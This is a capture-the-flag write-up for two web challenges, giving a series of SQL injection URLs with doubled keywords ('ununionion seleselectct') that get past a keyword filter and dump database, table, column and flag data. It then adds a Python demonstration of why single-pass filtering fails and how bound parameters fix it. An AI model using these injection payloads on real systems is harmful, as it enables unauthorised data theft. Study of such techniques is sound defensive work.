web18
Start by testing a single quotation mark:
http://123.206.31.85:10018/list.php?id=1'
This causes an error (meaning the content is no longer displayed).
Next, add a comment sequence:
http://123.206.31.85:10018/list.php?id=1'--+
There is no error this time, which shows that the parameter can be injected and that this is an ordinary injection.
Then try to determine the number of fields:
http://123.206.31.85:10018/list.php?id=1'union select 1,2,3--+
Every field count from 1 to 10 reported an error, so I then ran:
http://123.206.31.85:10018/list.php?id=1'union--+
which did not report an error. From this I found that keywords were being filtered.
Further testing showed that union, select and or were all filtered. The breakthrough was to double-write the keywords to bypass the filter.
Dump the database name:
?id=-1'ununionion seleselectct 1,database(),3--+
Dump the table names:
?id=-1'ununionion seleselectct 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+
Dump the column names:
?id=-1'ununionion seleselectct 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='flag'--+
Dump the flag:
?id=1 ununionion seleselectct 1,flag,3 from flag--+
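Why the doubled keywords get through, and what the fix looks like, as an added example that is not part of the original write-up or the challenge's code. It assumes the filter deletes each keyword in a single pass, uses SQLite in place of the challenge's database, and all function names and table contents are constructed for illustration.

```python
import re
import sqlite3

BLOCKED = ("union", "select", "or")  # keywords the write-up reports as filtered

def strip_once(value: str) -> str:
    # Assumed filter: each keyword is deleted in a single pass, so a keyword
    # wrapped around a copy of itself is reassembled by the deletion.
    for word in BLOCKED:
        value = re.sub(word, "", value, flags=re.IGNORECASE)
    return value

def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the challenge database.
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE list(id INTEGER, title TEXT, body TEXT);"
        "INSERT INTO list VALUES (1, 'hello', 'first post');"
        "CREATE TABLE flag(flag TEXT);"
        "INSERT INTO flag VALUES ('flag{constructed-sample}');"
    )
    return db

def lookup_filtered(db: sqlite3.Connection, raw_id: str):
    # Weak pattern: filter the input, then concatenate it into the SQL text.
    sql = "SELECT id, title, body FROM list WHERE id='" + strip_once(raw_id) + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db: sqlite3.Connection, raw_id: str):
    # Corrected pattern: the value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT id, title, body FROM list WHERE id = ?", (raw_id,)
    ).fetchall()

# Constructed input following the page's doubled-keyword pattern, URL-decoded
# ('+' becomes a space).
DOUBLED = "-1' ununionion seleselectct 1,flag,3 from flag-- "

if __name__ == "__main__":
    db = make_db()
    print(strip_once(DOUBLED))            # keywords are back after filtering
    print(lookup_filtered(db, DOUBLED))   # filter + concatenation leaks the row
    print(lookup_bound(db, DOUBLED))      # bound parameter matches nothing
    print(lookup_bound(db, "1"))          # legitimate id still works
```

With a bound parameter the keyword filter is unnecessary, which also avoids mangling legitimate input that happens to contain "or".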
End
web4
The second one needs little explanation: the universal password yields the flag directly.